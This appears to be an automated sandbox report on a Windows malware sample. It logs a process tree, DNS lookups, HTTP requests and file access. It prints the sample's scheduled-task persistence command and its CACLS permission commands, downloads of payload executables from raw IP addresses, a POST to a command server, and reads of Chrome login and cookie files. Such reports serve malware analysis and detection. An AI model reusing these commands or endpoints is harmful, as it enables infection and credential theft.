Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Sept. 2, 2023, 6:30 p.m. | Sept. 2, 2023, 6:50 p.m. |
-
-
-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
2888 -
cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
2936-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3056 -
cacls.exe CACLS "oneetx.exe" /P "test22:N"
2056 -
cacls.exe CACLS "oneetx.exe" /P "test22:R" /E
1728 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2064 -
cacls.exe CACLS "..\207aa4515d" /P "test22:N"
2176 -
cacls.exe CACLS "..\207aa4515d" /P "test22:R" /E
2224
-
-
-
taskhost.exe "C:\Users\test22\AppData\Local\Temp\1000397001\taskhost.exe"
2084
-
-
winlog.exe "C:\Users\test22\AppData\Local\Temp\1000398001\winlog.exe"
2788 -
msedge.exe "C:\Users\test22\AppData\Local\Temp\1000399001\msedge.exe"
2988 -
-
taskhost.exe "C:\Users\test22\AppData\Local\Temp\1000397001\taskhost.exe"
2308
-
-
winlog.exe "C:\Users\test22\AppData\Local\Temp\1000398001\winlog.exe"
3012 -
msedge.exe "C:\Users\test22\AppData\Local\Temp\1000399001\msedge.exe"
2548 -
4t.exe "C:\Users\test22\AppData\Local\Temp\1000436001\4t.exe"
544 -
-
taskhost.exe "C:\Users\test22\AppData\Local\Temp\1000397001\taskhost.exe"
1168
-
-
winlog.exe "C:\Users\test22\AppData\Local\Temp\1000398001\winlog.exe"
2628 -
msedge.exe "C:\Users\test22\AppData\Local\Temp\1000399001\msedge.exe"
2288
-
-
-
ss41.exe "C:\Users\test22\AppData\Local\Temp\ss41.exe"
2672
-
-
explorer.exe C:\Windows\Explorer.EXE
1452
Name | Response | Post-Analysis Lookup |
---|---|---|
z.nnnaajjjgc.com | 156.236.72.121 | |
happy1sept.tuktuk.ug | 85.209.3.9 |
Suricata Alerts
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
file | C:\Program Files\Mozilla Firefox\firefox.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://5.42.65.80/8bmeVwqx/index.php | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://5.42.65.80/softtool.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://95.214.27.254/getfile/taskhost.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://95.214.27.254/getfile/winlog.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://95.214.27.254/getfile/msedge.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://5.42.65.80/alldata.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://5.42.65.80/4t.exe |
request | POST http://5.42.65.80/8bmeVwqx/index.php |
request | GET http://5.42.65.80/softtool.exe |
request | GET http://95.214.27.254/getfile/taskhost.exe |
request | GET http://95.214.27.254/getfile/winlog.exe |
request | GET http://95.214.27.254/getfile/msedge.exe |
request | GET http://5.42.65.80/alldata.exe |
request | GET http://5.42.65.80/4t.exe |
request | POST http://5.42.65.80/8bmeVwqx/index.php |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Temp\1000434001\softtool.exe |
file | C:\Users\test22\AppData\Local\Temp\1000435001\alldata.exe |
file | C:\Users\test22\AppData\Local\Temp\1000436001\4t.exe |
file | C:\Users\test22\AppData\Local\Temp\ss41.exe |
file | C:\Users\test22\AppData\Local\Temp\1000397001\taskhost.exe |
file | C:\Users\test22\AppData\Local\Temp\1000399001\msedge.exe |
file | C:\Users\test22\AppData\Local\Temp\oldplayer.exe |
file | C:\Users\test22\AppData\Local\Temp\1000398001\winlog.exe |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F |
cmdline | "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit |
file | C:\Users\test22\AppData\Local\Temp\oldplayer.exe |
file | C:\Users\test22\AppData\Local\Temp\ss41.exe |
file | C:\Users\test22\AppData\Local\Temp\1000434001\softtool.exe |
file | C:\Users\test22\AppData\Local\Temp\1000397001\taskhost.exe |
file | C:\Users\test22\AppData\Local\Temp\1000398001\winlog.exe |
file | C:\Users\test22\AppData\Local\Temp\1000399001\msedge.exe |
file | C:\Users\test22\AppData\Local\Temp\1000435001\alldata.exe |
file | C:\Users\test22\AppData\Local\Temp\1000436001\4t.exe |
file | C:\Users\test22\AppData\Local\Temp\1000397001\taskhost.exe |
file | C:\Users\test22\AppData\Local\Temp\oldplayer.exe |
file | C:\Users\test22\AppData\Local\Temp\1000435001\alldata.exe |
file | C:\Users\test22\AppData\Local\Temp\1000434001\softtool.exe |